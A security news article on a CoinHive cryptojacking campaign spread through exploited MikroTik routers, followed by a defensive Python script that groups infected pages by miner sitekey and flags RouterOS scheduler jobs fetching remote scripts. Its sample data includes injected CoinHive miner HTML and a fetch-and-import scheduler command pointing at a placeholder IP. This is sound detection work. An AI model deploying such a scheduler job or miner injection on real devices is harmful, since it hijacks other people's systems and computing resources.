CoinHive Mining Attack Using MikroTik Routers Affects over 200,000 Devices

What could have been a low-scale website compromise turned out to be a massive cryptojacking attack. Simon Kenin, a security researcher at Trustwave, had just returned from presenting a talk at RSA Asia 2018 about cyber criminals and their use of cryptocurrencies for malicious activities. Call it coincidence, but immediately after returning to his office he noticed a massive surge of CoinHive, and upon further inspection he found it to be specifically associated with MikroTik network devices and heavily concentrated in Brazil. When Kenin dug deeper, he found that over 70,000 MikroTik devices had been exploited in this attack, a number which has since risen to 200,000.

Shodan search of MikroTik devices in Brazil with CoinHive yielded 70,000+ results. (Image: Simon Kenin / Trustwave)

“This could be a bizarre coincidence, but on further inspection I saw that all of these devices were using the same CoinHive sitekey, meaning that they all ultimately mine into the hands of one entity. I looked for the CoinHive site-key used on those devices, and saw that the attacker indeed mainly focused on Brazil.”

Shodan search of the CoinHive sitekey showed that all compromised devices were mining for the same attacker. (Image: Simon Kenin / Trustwave)

Kenin initially suspected the attack to be a zero-day exploit against MikroTik, but he later realized that the attackers were exploiting a known vulnerability in the routers. The vulnerability had been reported, and a patch was issued on 23 April to address it, but, as with most such updates, many routers were never updated and continued to run the vulnerable firmware. Kenin found hundreds of thousands of such outdated routers around the world, tens of thousands of them in Brazil.

The vulnerability was already known to let a remote attacker take administrative control of the router. This campaign took that a step further by using that access to “inject the CoinHive script into every web page that a user visited.” Kenin also noted three tactics that widened the attack's reach. First, the attackers replaced the router's error page with one carrying the CoinHive script, so the miner ran every time a user hit an error while browsing. Second, because the injection happens at the router, it reached visitors to websites served through a compromised router as well as users browsing from behind one: a victim did not need to own a MikroTik device at all, the router was simply the point of injection. Third, the attacker also used a MikroTik.php file programmed to inject CoinHive into every HTML page.

Because many Internet Service Providers (ISPs) use MikroTik routers to provide connectivity to enterprises at scale, this attack is considered a high-level threat: it was not aimed at unsuspecting home users but at large firms and enterprises. What’s more, the attacker installed a “u113.src” script on the routers that let them download further commands and code later. This lets the attacker keep access through the routers and switch to standby scripts if the original sitekey is blocked by CoinHive.
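As an added example (this is not Kenin's or Trustwave's code), the following Python triage script covers both the injection mechanism described two paragraphs up and the persistence mechanism just described. It pulls the CoinHive loader and sitekey out of a served page so that hits from many hosts can be grouped by the key they mine to, which is the pivot Kenin used to tie the routers to one operator, and it scans a RouterOS `/export` dump for scheduler jobs that fetch a remote script, the re-tasking channel the article calls u113.src. The HTML pages and the RouterOS configuration fragment are constructed for this example, and the `/tool fetch ... ; /import` shape of the scheduler job is an assumption about what such a job would look like, not a capture from the campaign.

```python
import re

# CoinHive's browser miner as it appeared in injected pages: a loader script
# plus a start call carrying the operator's 32-character sitekey.  Whatever
# the miner earns is credited to that key, so the key identifies the operator.
_LOADER = re.compile(
    r'<script[^>]*\bsrc=["\']https?://(?:www\.)?coinhive\.com/lib/coinhive\.min\.js["\']',
    re.IGNORECASE,
)
_START = re.compile(r'CoinHive\.(?:Anonymous|User)\(\s*["\']([A-Za-z0-9]{32})["\']')


def find_coinhive(html):
    """Report whether a page carries the CoinHive miner and which sitekey it mines to.

    Returns {"loader": bool, "sitekey": str or None}.  Either half alone is worth
    flagging: an injected error page may carry only the start call while the
    loader arrives via a different injected page.
    """
    key = _START.search(html)
    return {"loader": bool(_LOADER.search(html)),
            "sitekey": key.group(1) if key else None}


def group_by_sitekey(pages):
    """Map sitekey -> sorted hosts whose page mines to it (pages is {host: html}).

    Hosts with no sitekey land under None.  Many hosts under one key is the
    signature of a single campaign rather than unrelated compromises.
    """
    groups = {}
    for host, html in pages.items():
        groups.setdefault(find_coinhive(html)["sitekey"], []).append(host)
    return {k: sorted(v) for k, v in groups.items()}


# RouterOS export parsing.  Sections start with a "/path" line; entries in a
# section start with "add" or "set".  Field values may be quoted.
_NAME = re.compile(r'\bname=(\S+)')
_ON_EVENT = re.compile(r'\bon-event="((?:[^"\\]|\\.)*)"')
_FETCH_URL = re.compile(r'/tool fetch[^;]*?\burl=(?:\\?["\'])?(https?://[^\s"\';\\]+)')


def suspicious_scheduler_entries(export_text):
    """Find scheduler jobs in a RouterOS /export dump that download a remote file.

    Returns a list of (job_name, url).  A job that periodically fetches and
    imports a script is a re-tasking channel like the attacker's u113.src, so
    any such entry on a production router deserves a look, whatever its name.
    """
    hits = []
    section = None
    for raw in export_text.splitlines():
        line = raw.strip()
        if line.startswith("/"):
            section = line
            continue
        if section != "/system scheduler" or not line.startswith("add"):
            continue
        event = _ON_EVENT.search(line)
        if not event:
            continue
        url = _FETCH_URL.search(event.group(1))
        if url:
            name = _NAME.search(line)
            hits.append((name.group(1) if name else "?", url.group(1)))
    return hits


# Constructed sample inputs (not captured from the campaign).  The sitekey is
# a made-up 32-character value in the format CoinHive used.
SAMPLE_KEY = "aBcDeFgHiJkLmNoPqRsTuVwXyZ012345"
SAMPLE_PAGES = {
    "router-a.example": (
        '<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
        '<script>var miner=new CoinHive.Anonymous("' + SAMPLE_KEY + '");miner.start();'
        '</script></head><body>Error</body></html>'
    ),
    # Start call only: loader delivered elsewhere.
    "router-b.example": (
        '<html><body><script>new CoinHive.Anonymous("' + SAMPLE_KEY + '").start()'
        '</script></body></html>'
    ),
    "clean.example": "<html><body><h1>Welcome</h1></body></html>",
}
SAMPLE_EXPORT = """\
# constructed RouterOS export fragment; job shape is an assumption
/ip proxy
set enabled=yes port=8080
/system scheduler
add interval=1d name=backup on-event="/system backup save name=daily" start-time=startup
add interval=15m name=u113 on-event="/tool fetch url=http://203.0.113.5/u113.src mode=http; /import u113.src" start-time=startup
"""

if __name__ == "__main__":
    for key, hosts in group_by_sitekey(SAMPLE_PAGES).items():
        print("sitekey", key, "->", hosts)
    for name, url in suspicious_scheduler_entries(SAMPLE_EXPORT):
        print("scheduler job", name, "fetches", url)
```

Run against real responses, `group_by_sitekey` turns a pile of Shodan or crawler hits into a per-operator view; run against a router's `/export`, `suspicious_scheduler_entries` flags the fetch-and-import job without depending on the file being called u113.src.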